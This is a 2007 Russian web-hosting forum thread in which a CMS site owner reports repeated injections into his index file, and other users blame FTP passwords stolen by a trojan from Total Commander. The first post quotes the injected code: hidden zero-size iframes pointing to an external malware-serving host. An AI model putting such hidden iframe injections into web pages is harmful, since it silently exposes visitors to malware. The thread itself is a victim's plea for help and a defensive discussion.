Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Тематические » Системы управления сайтами » Взлом индексного файла

Модерирует : Antuan

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

vkserv

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Люди, сталкивался ли кто с проблемой взлома индексного файла на Куби? Мой сайт уже второй раз ломают и прописывают в индексном файле каким-то образом вот эту дрянь, что загружает вирус:
 
me src="http://pynet.ws/col/index.php" width="0" height="0" marginwidth="0"
marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ --><!-- ~ --><iframe src="http://pynet.ws/col/index.php" width="0" height="0" marginwidth="0"
marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->
 
Кубик v.4.3.2 с магазином. Как бороться с этим? Нигде не могу найти решения.

Всего записей: 3 | Зарегистр. 22-03-2007 | Отправлено: 15:17 28-04-2007
asfiles

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
http://at-first.info/virus.html
 
Тут можно почитать... Сам офигеваю... Поимел такую же херь у себя на сервере... Заразился один клиент и привет... В итоге с его паролем из какой-то малазии заходят (202.75.49.185) и подсовывают исправленный индексный фаил, в котором уже и содержится эта дрянь... Хостер тут чист =)))!  Смени пароль на ФТП + почисти себя антивирусом!

Всего записей: 53 | Зарегистр. 06-01-2004 | Отправлено: 19:32 30-04-2007
MaxTax



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Это проблема с дырявым хостингом, вернее с дырками в голове админов. Совет - искать жругой хостинг. Или все время менять парол на доступ к ФТП

Всего записей: 103 | Зарегистр. 20-08-2003 | Отправлено: 00:44 04-05-2007
4Life



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору

Цитата:
Это проблема с дырявым хостингом, вернее с дырками в голове админов. Совет - искать жругой хостинг. Или все время менять парол на доступ к ФТП

Хострер может только айпи закрыть или выделить на ФТП "зону" для клиента. А то, что клиент заразился и у него стырили пароль - проблема клиента

----------
▓▓▓Made in Ukraine▓▓▓

Всего записей: 766 | Зарегистр. 05-06-2003 | Отправлено: 11:19 04-05-2007
Vasya Pupkin



Мракобес
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
vkserv, проверь заплатки для кубика и чмоды на конфигурационных файлов. Все сторонние модули, скрипты, форумы и.т.д.
Смотри логи. Если сложно, то посмотри хотя бы дату изменения файлов, чтобы понять где собака зарыта. Скорее всего проблема у тебя, а не у хостера.

----------
я не люблю людей

Всего записей: 7062 | Зарегистр. 24-02-2001 | Отправлено: 11:59 04-05-2007
4Life



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Vasya Pupkin
так вроде как проблему узнали...


----------
▓▓▓Made in Ukraine▓▓▓

Всего записей: 766 | Зарегистр. 05-06-2003 | Отправлено: 12:11 04-05-2007
dreamer2

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
а как быть если у одного хостера несколько проектов индексные файлы получают такую херню?
юзеры/движки/пароли стоят разные, видимо все-таки у хостера что-то неладно

Всего записей: 45 | Зарегистр. 27-06-2003 | Отправлено: 17:30 10-05-2007
xelam

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
конечно у хостера...  и нормальные хостеры это признают

Всего записей: 23 | Зарегистр. 07-04-2004 | Отправлено: 01:22 11-05-2007
edogs

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Есть вирус/троян ходящий по компьютерам юзеров, выцепляющий фтп доступы (преимущественно из тотал командера, но не только) и прописывающий всюду вот такие индексные файлы.
Так что появление таких файлов не обязательно вина хостера.

Всего записей: 1777 | Зарегистр. 25-07-2004 | Отправлено: 02:08 11-05-2007
dreamer2

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
то что необязательно это понятно, но когда случаи множественные да и софтом народ разным пользуется, причем некоторые пароли не сохраняют..
 
если проблема у хостера, как можно свести риск к минимуму? 700 600 на каталогах/файлах поможет?
хотя если хостер все юзерские скрипты от одного логина пускает, наверное нет

Всего записей: 45 | Зарегистр. 27-06-2003 | Отправлено: 10:28 11-05-2007
edogs

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
dreamer2

Цитата:
то что необязательно это понятно, но когда случаи множественные да и софтом народ разным пользуется, причем некоторые пароли не сохраняют..  

Троянцы/вирусы не идиоты. Софта разного не так много настроить под большинство использующегося не сложно, не сохранящиеся пароли превосходно сниффером ловятся. Так что множественность вполне оправдана.
Вопрос про хостинг лучше в хостинговый раздел.

Всего записей: 1777 | Зарегистр. 25-07-2004 | Отправлено: 21:01 11-05-2007
amelanin



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
зы с января имел такую-же фигню... причем сразу на двух десятках своих сайтов... путем вычислений вычислил виновника Total Commander - из него крадут пароли на FTP доступ...
 
зы подробности моей (и не только моей) эпопеи тут - http://tsbs.ru/forum/index.php?showtopic=2924&st=0

Всего записей: 40 | Зарегистр. 24-10-2006 | Отправлено: 02:51 12-05-2007
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Тематические » Системы управления сайтами » Взлом индексного файла


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru